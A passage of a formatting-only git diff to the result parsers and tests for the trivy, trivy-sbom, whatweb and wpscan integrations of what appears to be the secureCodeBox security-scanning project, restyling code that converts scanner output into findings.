90, + ), ).rejects.toThrow("HTTP request failed"); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/scanners/trivy-sbom/parser/parser.test.js b/scanners/trivy-sbom/parser/parser.test.js index 9cde675b46..5b04c4b177 100644 --- a/scanners/trivy-sbom/parser/parser.test.js +++ b/scanners/trivy-sbom/parser/parser.test.js @@ -32,9 +32,9 @@ test("should create finding correctly", async () => { bomFormat: "CycloneDX", metadata: { component: { - name: "hello-world:latest" - } - } + name: "hello-world:latest", + }, + }, }; const findings = await parse(JSON.stringify(result), scan); @@ -59,7 +59,7 @@ test("should properly parse cyclonedx json sbom file", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/hello-world-cyclonedx.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent, scan); // validate findings diff --git a/scanners/trivy/integration-tests/trivy.test.js b/scanners/trivy/integration-tests/trivy.test.js index 7432f21bb2..0a61343437 100644 --- a/scanners/trivy/integration-tests/trivy.test.js +++ b/scanners/trivy/integration-tests/trivy.test.js @@ -13,7 +13,7 @@ test.concurrent( "trivy-juice-test", "trivy-image", ["bkimminich/juice-shop:v10.2.0"], - 90 + 90, ); expect(count).toBeGreaterThanOrEqual(40); @@ -23,7 +23,7 @@ test.concurrent( expect(severities["medium"]).toBeGreaterThanOrEqual(10); expect(severities["low"]).toBeGreaterThanOrEqual(1); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); test.concurrent( @@ -35,36 +35,46 @@ test.concurrent( ["/repo/"], 90, // volumes - [{ - "name": "test-dir", - "emptyDir": {} - }], + [ + { + name: "test-dir", + emptyDir: {}, + }, + ], // volumeMounts - [{ - "mountPath": "/repo/", - "name": "test-dir" - }], + [ + { + mountPath: "/repo/", + name: "test-dir", + }, + ], // initContainers - [{ - "name": "init-git", - "image": "bitnami/git", - "command": ["bash", - "-c", - // Bash script to create a git repo with a demo file - `cd /repo && \\ - git clone https://github.com/knqyf263/trivy-ci-test`], - "volumeMounts": [{ - "mountPath": "/repo/", - "name": "test-dir" - }] - }] + [ + { + name: "init-git", + image: "bitnami/git", + command: [ + "bash", + "-c", + // Bash script to create a git repo with a demo file + `cd /repo && \\ + git clone https://github.com/knqyf263/trivy-ci-test`, + ], + volumeMounts: [ + { + mountPath: "/repo/", + name: "test-dir", + }, + ], + }, + ], ); expect(count).toBeGreaterThanOrEqual(9); expect(severities["high"]).toBeGreaterThanOrEqual(2); expect(severities["medium"]).toBeGreaterThanOrEqual(1); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); test.concurrent( @@ -74,14 +84,14 @@ test.concurrent( "trivy-repo-test", "trivy-repo", ["https://github.com/knqyf263/trivy-ci-test"], - 90 + 90, ); expect(count).toBeGreaterThanOrEqual(9); expect(severities["high"]).toBeGreaterThanOrEqual(2); expect(severities["medium"]).toBeGreaterThanOrEqual(1); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); test.concurrent( @@ -92,11 +102,11 @@ test.concurrent( "trivy-invalidArg", "trivy", ["--invalidArg", "not/a-valid-image:v0.0.0"], - 90 - ) + 90, + ), ).rejects.toThrow("HTTP request failed"); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); test.concurrent( "trivy k8s scan should not fail", @@ -105,8 +115,14 @@ test.concurrent( "trivy-k8s-test", "trivy-k8s", // scanners is limited to config, and namespace to default to reduce the time of the test - ["--debug", "--scanners", "misconfig", "--include-namespaces", "securecodebox-system"], - 10 * 60 * 1000 + [ + "--debug", + "--scanners", + "misconfig", + "--include-namespaces", + "securecodebox-system", + ], + 10 * 60 * 1000, ); // since the state of the k8s cluster in the test environment cannot be predicted, only the structure of the result is assured here @@ -122,5 +138,5 @@ test.concurrent( expect(severityNames.includes("medium")).toBeTruthy(); expect(severityNames.includes("high")).toBeTruthy(); }, - 10 * 60 * 1000 + 10 * 60 * 1000, ); diff --git a/scanners/trivy/parser/parser.js b/scanners/trivy/parser/parser.js index 973aecf8f4..5f98629f5d 100644 --- a/scanners/trivy/parser/parser.js +++ b/scanners/trivy/parser/parser.js @@ -8,14 +8,14 @@ async function parse(fileContent) { let scanResults = fileContent; if (typeof fileContent === "string") { if (fileContent.includes("{") && fileContent.includes("}")) { - scanResults = JSON.parse(fileContent) + scanResults = JSON.parse(fileContent); } else { // empty file return []; } } - if (Object.prototype.hasOwnProperty.call(scanResults, 'ClusterName')) { + if (Object.prototype.hasOwnProperty.call(scanResults, "ClusterName")) { // Results of k8s-scans always contain an attribute 'ClusterName' at first position of the JSON document. // These scan-results need a different parsing const clusterName = scanResults.ClusterName; @@ -27,60 +27,75 @@ async function parse(fileContent) { function parseImageScanResults(imageScanResults) { // check if imageScanResults.Results is an array and non empty - if (!Array.isArray(imageScanResults.Results) || imageScanResults.Results.length === 0) { + if ( + !Array.isArray(imageScanResults.Results) || + imageScanResults.Results.length === 0 + ) { return []; } const imageId = imageScanResults.ArtifactName; - - // Use flatMap to iterate through imageScanResults.Results and flatten the resulting findings array -const findings = imageScanResults.Results.flatMap(({ Target: target, Vulnerabilities }) => { - const vulnerabilities = Vulnerabilities || []; - const category = getCategory(target); - - // Map each vulnerability to a finding object - return vulnerabilities.map(vulnerability => { - const { VulnerabilityID, References } = vulnerability; - - // Create CVE/NSWG references and their URLs if applicable - const cve_nswg_references = VulnerabilityID.startsWith("CVE-") ? [ - { type: "CVE", value: VulnerabilityID }, - { type: "URL", value: `https://nvd.nist.gov/vuln/detail/${VulnerabilityID}` } - ] : VulnerabilityID.startsWith("NSWG-") ? [ - { type: "NSWG", value: VulnerabilityID }, - { type: "URL", value: `https://github.com/nodejs/security-wg/tree/master/vuln` } - ] : []; - - const url_references = getUrlReferences(References); - - // Combine CVE/NSWG and URL references - const references = [...cve_nswg_references, ...url_references]; - - // Return the findings object for the current vulnerability - return { - name: vulnerability.Title || `Vulnerability in Dependency ${vulnerability.PkgName} (${vulnerability.InstalledVersion})`, - description: vulnerability.Description, - category, - location: `scb://trivy/?ArtifactName=${imageId}`, - osi_layer: "NOT_APPLICABLE", - severity: getAdjustedSeverity(vulnerability.Severity), - mitigation: `Update the affected package ${vulnerability.PkgName} to the fixed version: ${vulnerability.FixedVersion} or remove the package from the image.`, - references, - attributes: { - installedVersion: vulnerability.InstalledVersion, - fixedVersion: vulnerability.FixedVersion, - packageName: vulnerability.PkgName, - vulnerabilityId: VulnerabilityID, - references: References, - foundIn: target, - }, - }; - }); -}); - -return findings; + // Use flatMap to iterate through imageScanResults.Results and flatten the resulting findings array + const findings = imageScanResults.Results.flatMap( + ({ Target: target, Vulnerabilities }) => { + const vulnerabilities = Vulnerabilities || []; + const category = getCategory(target); + + // Map each vulnerability to a finding object + return vulnerabilities.map((vulnerability) => { + const { VulnerabilityID, References } = vulnerability; + + // Create CVE/NSWG references and their URLs if applicable + const cve_nswg_references = VulnerabilityID.startsWith("CVE-") + ? [ + { type: "CVE", value: VulnerabilityID }, + { + type: "URL", + value: `https://nvd.nist.gov/vuln/detail/${VulnerabilityID}`, + }, + ] + : VulnerabilityID.startsWith("NSWG-") + ? [ + { type: "NSWG", value: VulnerabilityID }, + { + type: "URL", + value: `https://github.com/nodejs/security-wg/tree/master/vuln`, + }, + ] + : []; + + const url_references = getUrlReferences(References); + + // Combine CVE/NSWG and URL references + const references = [...cve_nswg_references, ...url_references]; + + // Return the findings object for the current vulnerability + return { + name: + vulnerability.Title || + `Vulnerability in Dependency ${vulnerability.PkgName} (${vulnerability.InstalledVersion})`, + description: vulnerability.Description, + category, + location: `scb://trivy/?ArtifactName=${imageId}`, + osi_layer: "NOT_APPLICABLE", + severity: getAdjustedSeverity(vulnerability.Severity), + mitigation: `Update the affected package ${vulnerability.PkgName} to the fixed version: ${vulnerability.FixedVersion} or remove the package from the image.`, + references, + attributes: { + installedVersion: vulnerability.InstalledVersion, + fixedVersion: vulnerability.FixedVersion, + packageName: vulnerability.PkgName, + vulnerabilityId: VulnerabilityID, + references: References, + foundIn: target, + }, + }; + }); + }, + ); + return findings; } function parseK8sScanResults(clusterName, scanResults) { @@ -102,19 +117,26 @@ function parseK8sScanResults(clusterName, scanResults) { */ return new Promise((resolve, reject) => { - var keys = Object.keys(scanResults); const expectedTopLevelAttributes = ["ClusterName", "Resources"]; - const found = keys.find(key => !expectedTopLevelAttributes.includes(key)); + const found = keys.find((key) => !expectedTopLevelAttributes.includes(key)); if (found !== undefined) { - reject(new Error("Unexpected attribute '" + found + "' on top-level of scan-result document")); + reject( + new Error( + "Unexpected attribute '" + + found + + "' on top-level of scan-result document", + ), + ); } if (!scanResults.Resources || scanResults.Resources.length === 0) { reject(new Error("No resources listet in scan-result document")); } - const findings = scanResults.Resources.flatMap((resourceItem) => parseK8sScanResultResource(clusterName, resourceItem, reject)); + const findings = scanResults.Resources.flatMap((resourceItem) => + parseK8sScanResultResource(clusterName, resourceItem, reject), + ); resolve(findings); }); @@ -123,49 +145,99 @@ function parseK8sScanResults(clusterName, scanResults) { function parseK8sScanResultResource(clusterName, resourceItem, reject) { let findings = []; - const {Namespace: namespace, Kind: kind, Name: name, Results} = resourceItem; + const { + Namespace: namespace, + Kind: kind, + Name: name, + Results, + } = resourceItem; const results = Results || []; for (const aResult of results) { - const {Target: target, Class: clazz, Type: type} = aResult; + const { Target: target, Class: clazz, Type: type } = aResult; const keys = Object.keys(aResult); - const expectedAttributes = ["Target", "Class", "Type", "Misconfigurations", "Vulnerabilities", "MisconfSummary", "Packages"]; + const expectedAttributes = [ + "Target", + "Class", + "Type", + "Misconfigurations", + "Vulnerabilities", + "MisconfSummary", + "Packages", + ]; // The "Packages" attribute is now included in the scan report by default starting with Trivy 0.56.0 (https://github.com/aquasecurity/trivy/pull/6765) - const found = keys.find(key => !expectedAttributes.includes(key)); + const found = keys.find((key) => !expectedAttributes.includes(key)); if (found !== undefined) { - reject(new Error("Unexpected attribute '" + found + "' on resource-item")); + reject( + new Error("Unexpected attribute '" + found + "' on resource-item"), + ); } - let categoryName = 'Vulnerabilities'; + let categoryName = "Vulnerabilities"; const vulnerabilities = aResult[categoryName] || []; findings = findings.concat( - vulnerabilities.map(vulnerability => - convertTrivyK8sFindingToSCBFinding(vulnerability, clusterName, namespace, kind, name, target, clazz, type, categoryName) - ) + vulnerabilities.map((vulnerability) => + convertTrivyK8sFindingToSCBFinding( + vulnerability, + clusterName, + namespace, + kind, + name, + target, + clazz, + type, + categoryName, + ), + ), ); - categoryName = 'Misconfigurations'; + categoryName = "Misconfigurations"; const misconfigurations = aResult[categoryName] || []; findings = findings.concat( - misconfigurations.map(misconfiguration => - convertTrivyK8sFindingToSCBFinding(misconfiguration, clusterName, namespace, kind, name, target, clazz, type, categoryName) - ) + misconfigurations.map((misconfiguration) => + convertTrivyK8sFindingToSCBFinding( + misconfiguration, + clusterName, + namespace, + kind, + name, + target, + clazz, + type, + categoryName, + ), + ), ); } return findings; } -function convertTrivyK8sFindingToSCBFinding(trivyK8sFinding, clusterName, namespace, kind, k8sName, target, clazz, type, categoryName) { - let references = trivyK8sFinding.PrimaryURL ? [{type: "URL", value: trivyK8sFinding.PrimaryURL}] : []; - - const url_references = getUrlReferences(trivyK8sFinding.References).filter(ref => ref.value !== trivyK8sFinding.PrimaryURL); +function convertTrivyK8sFindingToSCBFinding( + trivyK8sFinding, + clusterName, + namespace, + kind, + k8sName, + target, + clazz, + type, + categoryName, +) { + let references = trivyK8sFinding.PrimaryURL + ? [{ type: "URL", value: trivyK8sFinding.PrimaryURL }] + : []; + + const url_references = getUrlReferences(trivyK8sFinding.References).filter( + (ref) => ref.value !== trivyK8sFinding.PrimaryURL, + ); references = references.concat(url_references); - const category = categoryName === 'Vulnerabilities' ? 'Vulnerability' : 'Misconfiguration'; + const category = + categoryName === "Vulnerabilities" ? "Vulnerability" : "Misconfiguration"; - let name = `Finding in Dependency ${trivyK8sFinding.PkgName} (${trivyK8sFinding.InstalledVersion})` + let name = `Finding in Dependency ${trivyK8sFinding.PkgName} (${trivyK8sFinding.InstalledVersion})`; if (trivyK8sFinding.Title) { name = trivyK8sFinding.Title; if (trivyK8sFinding.Message) { @@ -179,9 +251,9 @@ function convertTrivyK8sFindingToSCBFinding(trivyK8sFinding, clusterName, namesp if (namespace) urlParams.push(`Namespace=${namespace}`); urlParams.push(`Kind=${kind}`, `Name=${k8sName}`); - const location = baseUrl + urlParams.join('&'); + const location = baseUrl + urlParams.join("&"); - let foundIn = `Target: '${target}'` + let foundIn = `Target: '${target}'`; if (clazz) { foundIn = `${foundIn} / Class: '${clazz}'`; } @@ -195,13 +267,17 @@ function convertTrivyK8sFindingToSCBFinding(trivyK8sFinding, clusterName, namesp category, location, severity: getAdjustedSeverity(trivyK8sFinding.Severity), - mitigation: trivyK8sFinding.Resolution ? trivyK8sFinding.Resolution : undefined, + mitigation: trivyK8sFinding.Resolution + ? trivyK8sFinding.Resolution + : undefined, references, attributes: { installedVersion: trivyK8sFinding.InstalledVersion, fixedVersion: trivyK8sFinding.FixedVersion, packageName: trivyK8sFinding.PkgName, - id: trivyK8sFinding.VulnerabilityID ? trivyK8sFinding.VulnerabilityID : trivyK8sFinding.ID, + id: trivyK8sFinding.VulnerabilityID + ? trivyK8sFinding.VulnerabilityID + : trivyK8sFinding.ID, references: trivyK8sFinding.References, foundIn, }, @@ -213,33 +289,38 @@ function convertTrivyK8sFindingToSCBFinding(trivyK8sFinding, clusterName, namesp * Create URL references from the vulnerability references */ function getUrlReferences(References) { - return References ? References.filter(ref => ref.startsWith("http")).map(ref => ({type: "URL", value: ref})) : []; + return References + ? References.filter((ref) => ref.startsWith("http")).map((ref) => ({ + type: "URL", + value: ref, + })) + : []; } function getCategory(target) { - let category = "Image Vulnerability"; - if (target.endsWith("package-lock.json") || target == "Node.js") { - category = "NPM Package Vulnerability"; - } else if (target.endsWith("Gemfile.lock")) { - category = "Ruby Package Vulnerability"; - } else if (target.endsWith("Pipfile.lock")) { - category = "Python Package Vulnerability"; - } else if (target.endsWith("Cargo.lock")) { - category = "Rust Package Vulnerability"; - } else if (target.endsWith("Composer.lock")) { - category = "PHP Package Vulnerability"; - } else if (target.endsWith("go.sum")) { - category = "Go Package Vulnerability"; - } - return category; + let category = "Image Vulnerability"; + if (target.endsWith("package-lock.json") || target == "Node.js") { + category = "NPM Package Vulnerability"; + } else if (target.endsWith("Gemfile.lock")) { + category = "Ruby Package Vulnerability"; + } else if (target.endsWith("Pipfile.lock")) { + category = "Python Package Vulnerability"; + } else if (target.endsWith("Cargo.lock")) { + category = "Rust Package Vulnerability"; + } else if (target.endsWith("Composer.lock")) { + category = "PHP Package Vulnerability"; + } else if (target.endsWith("go.sum")) { + category = "Go Package Vulnerability"; + } + return category; } -function getAdjustedSeverity(severity){ +function getAdjustedSeverity(severity) { return severity === "CRITICAL" - ? "HIGH" - : severity === "UNKNOWN" - ? "INFORMATIONAL" - : severity; + ? "HIGH" + : severity === "UNKNOWN" + ? "INFORMATIONAL" + : severity; } module.exports.parse = parse; diff --git a/scanners/trivy/parser/parser.test.js b/scanners/trivy/parser/parser.test.js index 12c60fd9b2..982b8315c9 100644 --- a/scanners/trivy/parser/parser.test.js +++ b/scanners/trivy/parser/parser.test.js @@ -7,13 +7,13 @@ const { validateParser, } = require("@securecodebox/parser-sdk-nodejs/parser-utils"); -const {parse} = require("./parser"); +const { parse } = require("./parser"); test("parses bkimminich/juice-shop:v10.2.0 result file into findings", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/juice-shop-v10.2.0.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -24,7 +24,7 @@ test("parses bkimminich/juice-shop:v12.10.2 result file into findings", async () const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/juice-shop-v12.10.2.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -35,31 +35,32 @@ test("parses securecodebox:master result file into findings", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/securecodebox-repo.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchSnapshot(); }); - test("should properly parse a json file with no .Results", async () => { const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/juice-shop-v12.10.2-no-results.json", { - encoding: "utf8", - }) + await readFile( + __dirname + "/__testFiles__/juice-shop-v12.10.2-no-results.json", + { + encoding: "utf8", + }, + ), ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(`[]`); - }); test("should parse a trivy-k8s scan result of a cluster running secureCodeBox itself", async () => { const jsonContent = JSON.parse( await readFile(__dirname + "/__testFiles__/local-k8s-scan-result.json", { encoding: "utf8", - }) + }), ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -68,12 +69,15 @@ test("should parse a trivy-k8s scan result of a cluster running secureCodeBox it test("should report an error in case of unexpected attributes in a trivy-k8s scan result", async () => { const jsonContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/k8s-results_unexpected-attribute.json", { - encoding: "utf8", - }) + await readFile( + __dirname + "/__testFiles__/k8s-results_unexpected-attribute.json", + { + encoding: "utf8", + }, + ), ); await expect(parse(jsonContent)).rejects.toThrow( - "Unexpected attribute 'Secrets' on resource-item" + "Unexpected attribute 'Secrets' on resource-item", ); }); @@ -81,19 +85,21 @@ test("should parse a trivy-k8s scan result", async () => { const jsonContent = JSON.parse( await readFile(__dirname + "/__testFiles__/trivy--k8s-scan-results.json", { encoding: "utf8", - }) + }), ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchSnapshot(); }); - test("should properly parse a json file with empty .Results", async () => { const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/juice-shop-v12.10.2-empty-results.json", { - encoding: "utf8", - }) + await readFile( + __dirname + "/__testFiles__/juice-shop-v12.10.2-empty-results.json", + { + encoding: "utf8", + }, + ), ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -105,7 +111,7 @@ test("should properly parse empty json file", async () => { __dirname + "/__testFiles__/test-empty-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/whatweb/integration-tests/whatweb.test.js b/scanners/whatweb/integration-tests/whatweb.test.js index f6961983f8..a304a734d2 100644 --- a/scanners/whatweb/integration-tests/whatweb.test.js +++ b/scanners/whatweb/integration-tests/whatweb.test.js @@ -9,11 +9,11 @@ jest.retryTimes(3); test( "Whatweb scans example.com", async () => { - const {categories, severities, count} = await scan( + const { categories, severities, count } = await scan( "whatweb-example", "whatweb", ["example.com"], - 90 + 90, ); expect(count).toBe(1); @@ -28,15 +28,20 @@ test( } `); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); test( "Invalid argument should be marked as errored", async () => { await expect( - scan("whatweb-invalidArg", "whatweb", ["--invalidArg", "example.com"], 90) + scan( + "whatweb-invalidArg", + "whatweb", + ["--invalidArg", "example.com"], + 90, + ), ).rejects.toThrow("HTTP request failed"); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/scanners/whatweb/parser/parser.js b/scanners/whatweb/parser/parser.js index 4e29bd0f31..f4cf033cde 100644 --- a/scanners/whatweb/parser/parser.js +++ b/scanners/whatweb/parser/parser.js @@ -8,32 +8,33 @@ async function parse(fileContent) { } function transformToFindings(targets) { - - const targetFindings = targets.map(target => { + const targetFindings = targets.map((target) => { let finding = { name: target.uri, category: "WEB APPLICATION", description: target.title, location: target.uri, - osi_layer: 'NETWORK', - severity: 'INFORMATIONAL', + osi_layer: "NETWORK", + severity: "INFORMATIONAL", attributes: { requestConfig: target.requestConfig, ip_addresses: [target.ipAddress], country: target.country, - HTML5: target.html5 - } + HTML5: target.html5, + }, }; - target.additional.forEach(additional => { - if (!finding.attributes[additional[0]]) { //Check if key already exists + target.additional.forEach((additional) => { + if (!finding.attributes[additional[0]]) { + //Check if key already exists finding.attributes[additional[0]] = - (("string" in additional[1]) ? additional[1].string[0] : "") + - (("module" in additional[1]) ? "/" + additional[1].module[0] : ""); + ("string" in additional[1] ? additional[1].string[0] : "") + + ("module" in additional[1] ? "/" + additional[1].module[0] : ""); } }); - if (!finding.attributes.HTML5) //Do not show in findings if undefined + if (!finding.attributes.HTML5) + //Do not show in findings if undefined delete finding.attributes.HTML5; return finding; @@ -47,35 +48,45 @@ function transformToFindings(targets) { * @param {*} fileContent */ function parseResultFile(fileContent) { - let targetList = []; + let targetList = []; - for(const rawTarget of fileContent) { - if (Object.keys(rawTarget).length > 0) { //Check for empty target - let newTarget = { - uri: rawTarget.target, - httpStatus: rawTarget.http_status, - requestConfig: rawTarget.request_config.headers["User-Agent"], - ipAddress: null, - title: null, - html5: null, - country: null, - additional: [] - } - if(rawTarget.plugins) { - for(const [key, value] of Object.entries(rawTarget.plugins)) { - switch(key) { - case "IP": newTarget.ipAddress = value.string[0]; break; - case "Title": newTarget.title = value.string[0]; break; - case "HTML5": newTarget.html5 = true; break; - case "Country": newTarget.country = value.string[0] + "/" + value.module[0]; break; - default: newTarget.additional.push([key, value]); - } + for (const rawTarget of fileContent) { + if (Object.keys(rawTarget).length > 0) { + //Check for empty target + let newTarget = { + uri: rawTarget.target, + httpStatus: rawTarget.http_status, + requestConfig: rawTarget.request_config.headers["User-Agent"], + ipAddress: null, + title: null, + html5: null, + country: null, + additional: [], + }; + if (rawTarget.plugins) { + for (const [key, value] of Object.entries(rawTarget.plugins)) { + switch (key) { + case "IP": + newTarget.ipAddress = value.string[0]; + break; + case "Title": + newTarget.title = value.string[0]; + break; + case "HTML5": + newTarget.html5 = true; + break; + case "Country": + newTarget.country = value.string[0] + "/" + value.module[0]; + break; + default: + newTarget.additional.push([key, value]); } } - targetList.push(newTarget); } + targetList.push(newTarget); } - return targetList; + } + return targetList; } module.exports.parse = parse; diff --git a/scanners/whatweb/parser/parser.test.js b/scanners/whatweb/parser/parser.test.js index 3b29d40852..97ed04a773 100644 --- a/scanners/whatweb/parser/parser.test.js +++ b/scanners/whatweb/parser/parser.test.js @@ -7,13 +7,13 @@ const { validateParser, } = require("@securecodebox/parser-sdk-nodejs/parser-utils"); -const {parse} = require("./parser"); +const { parse } = require("./parser"); test("should properly parse whatweb json file", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/example.com.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); // validate findings @@ -45,7 +45,7 @@ test("should properly parse empty whatweb json file", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/no-address.com.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); // validate findings @@ -57,7 +57,7 @@ test("should properly parse securecodebox.io whatweb json file with higher aggre const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/securecodebox.io.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); // validate findings @@ -134,7 +134,7 @@ test("should properly parse whatweb json file with two domains", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/two-domains.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); // validate findings diff --git a/scanners/wpscan/integration-tests/wpscan.test.js b/scanners/wpscan/integration-tests/wpscan.test.js index 6ffda8a3da..ef1396d399 100644 --- a/scanners/wpscan/integration-tests/wpscan.test.js +++ b/scanners/wpscan/integration-tests/wpscan.test.js @@ -13,9 +13,9 @@ test( "wpscan-scanner-dummy-scan", "wpscan", ["--url", "old-wordpress.demo-targets.svc"], - 90 + 90, ); expect(count).toBeGreaterThanOrEqual(0); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/scanners/wpscan/parser/parser.js b/scanners/wpscan/parser/parser.js index 7fa2a901a7..0b2d4de7a8 100644 --- a/scanners/wpscan/parser/parser.js +++ b/scanners/wpscan/parser/parser.js @@ -6,7 +6,8 @@ * Convert the WPScan file / json into secureCodeBox Findings */ async function parse(scanResults) { - if (typeof (scanResults) === "string") // empty file + if (typeof scanResults === "string") + // empty file return []; const wpscanVersion = scanResults.banner.version; @@ -18,93 +19,96 @@ async function parse(scanResults) { const identified_at = new Date(scanResults.stop_time * 1000).toISOString(); // Add a general INFORMATIONAL summary finding -const summaryFinding = { - name: "WordPress Service", - description: "WordPress Service Information", - identified_at: identified_at, - category: "WordPress Service", - location: targetUrl, - osi_layer: "APPLICATION", - severity: "INFORMATIONAL", - references: null, - confidence: scanResults.version?.confidence, - attributes: { - hostname: targetUrl, - ip_addresses: [targetIp], - wpscan_version: wpscanVersion, - wpscan_requests: wpscanRequestsDone, - wp_version: scanResults.version?.number, - wp_release_date: scanResults.version?.release_date, - wp_release_status: scanResults.version?.status, - wp_interesting_entries: scanResults.version?.interesting_entries, - wp_found_by: scanResults.version?.found_by, - wp_confirmed_by: scanResults.version?.confirmed_by, - wp_vulnerabilities: scanResults.version?.vulnerabilities, - }, -}; - -// Add all interesting findings as INFORMATIONAL -const interestingFindings = scanResults.interesting_findings.map(interestingFinding => { - // Create a flattened array of references with their types - const references = Object.entries(interestingFinding.references) - .flatMap(([key, elements]) => - elements.map(element => ({ - type: key.toUpperCase(), - value: element, - })) - ); - - // Return the interesting findings object for the current entry - return { - name: `WordPress finding '${interestingFinding.type}'`, - description: interestingFinding.to_s, - category: `WordPress ${interestingFinding.type}`, - location: interestingFinding.url, + const summaryFinding = { + name: "WordPress Service", + description: "WordPress Service Information", + identified_at: identified_at, + category: "WordPress Service", + location: targetUrl, osi_layer: "APPLICATION", severity: "INFORMATIONAL", - confidence: interestingFinding.confidence, - references: references.length > 0 ? references : null, + references: null, + confidence: scanResults.version?.confidence, attributes: { hostname: targetUrl, - wp_interesting_entries: interestingFinding.interesting_entries, - wp_found_by: interestingFinding.found_by, - wp_confirmed_by: interestingFinding.confirmed_by, + ip_addresses: [targetIp], + wpscan_version: wpscanVersion, + wpscan_requests: wpscanRequestsDone, + wp_version: scanResults.version?.number, + wp_release_date: scanResults.version?.release_date, + wp_release_status: scanResults.version?.status, + wp_interesting_entries: scanResults.version?.interesting_entries, + wp_found_by: scanResults.version?.found_by, + wp_confirmed_by: scanResults.version?.confirmed_by, + wp_vulnerabilities: scanResults.version?.vulnerabilities, }, }; -}); -// Add plugin vulnerabilities as HIGH -const pluginVulnerabilities = Object.values(scanResults.plugins).flatMap(plugin => - plugin.vulnerabilities.map(vulnerability => { - // Create a flattened array of references with their types - const references = Object.entries(vulnerability.references) - .flatMap(([key, elements]) => - elements.map(element => ({ - type: key.toUpperCase(), - value: element, - })) + // Add all interesting findings as INFORMATIONAL + const interestingFindings = scanResults.interesting_findings.map( + (interestingFinding) => { + // Create a flattened array of references with their types + const references = Object.entries(interestingFinding.references).flatMap( + ([key, elements]) => + elements.map((element) => ({ + type: key.toUpperCase(), + value: element, + })), ); - // Return the plugin vulnerabilities object for the current plugin and vulnerability - return { - name: `WordPress finding: vulnerability in '${plugin['slug']}'`, - description: vulnerability['title'], - category: "WordPress Plugin", - location: plugin['location'], - osi_layer: "APPLICATION", - severity: "HIGH", - references: references.length > 0 ? references : null, - attributes: { - hostname: targetUrl, - confidence: plugin['confidence'], - wp_interesting_entries: plugin['interesting_entries'], - wp_found_by: plugin['found_by'], - wp_confirmed_by: plugin['confirmed_by'], - }, - }; - }) -); -// Combine all findings and return -return [summaryFinding, ...interestingFindings, ...pluginVulnerabilities]; + // Return the interesting findings object for the current entry + return { + name: `WordPress finding '${interestingFinding.type}'`, + description: interestingFinding.to_s, + category: `WordPress ${interestingFinding.type}`, + location: interestingFinding.url, + osi_layer: "APPLICATION", + severity: "INFORMATIONAL", + confidence: interestingFinding.confidence, + references: references.length > 0 ? references : null, + attributes: { + hostname: targetUrl, + wp_interesting_entries: interestingFinding.interesting_entries, + wp_found_by: interestingFinding.found_by, + wp_confirmed_by: interestingFinding.confirmed_by, + }, + }; + }, + ); + + // Add plugin vulnerabilities as HIGH + const pluginVulnerabilities = Object.values(scanResults.plugins).flatMap( + (plugin) => + plugin.vulnerabilities.map((vulnerability) => { + // Create a flattened array of references with their types + const references = Object.entries(vulnerability.references).flatMap( + ([key, elements]) => + elements.map((element) => ({ + type: key.toUpperCase(), + value: element, + })), + ); + // Return the plugin vulnerabilities object for the current plugin and vulnerability + return { + name: `WordPress finding: vulnerability in '${plugin["slug"]}'`, + description: vulnerability["title"], + category: "WordPress Plugin", + location: plugin["location"], + osi_layer: "APPLICATION", + severity: "HIGH", + references: references.length > 0 ? references : null, + attributes: { + hostname: targetUrl, + confidence: plugin["confidence"], + wp_interesting_entries: plugin["interesting_entries"], + wp_found_by: plugin["found_by"], + wp_confirmed_by: plugin["confirmed_by"], + }, + }; + }), + ); + + // Combine all findings and return + return [summaryFinding, ...interestingFindings, ...pluginVulnerabilities]; } module.exports.parse = parse; diff --git a/scanners/wpscan/parser/parser.test.js b/scanners/wpscan/parser/parser.test.js index 69a866f652..0c71ad9967 100644 --- a/scanners/wpscan/parser/parser.test.js +++ b/scanners/wpscan/parser/parser.test.js @@ -7,13 +7,13 @@ const { validateParser, } = require("@securecodebox/parser-sdk-nodejs/parser-utils"); -const {parse} = require("./parser"); +const { parse } = require("./parser"); test("WPScan parser parses a successfully scan result with at least one informational finding", async () => { const scanResults = JSON.parse( await readFile(__dirname + "/__testFiles__/example-latest.json", { encoding: "utf8", - }) + }), ); const findings = await parse(scanResults); @@ -191,7 +191,7 @@ test("WPScan parser parses a scan result file without a detected wp version corr const scanResults = JSON.parse( await readFile(__dirname + "/__testFiles__/no-version-detected.json", { encoding: "utf8", - }) + }), ); const findings = await parse(scanResults); 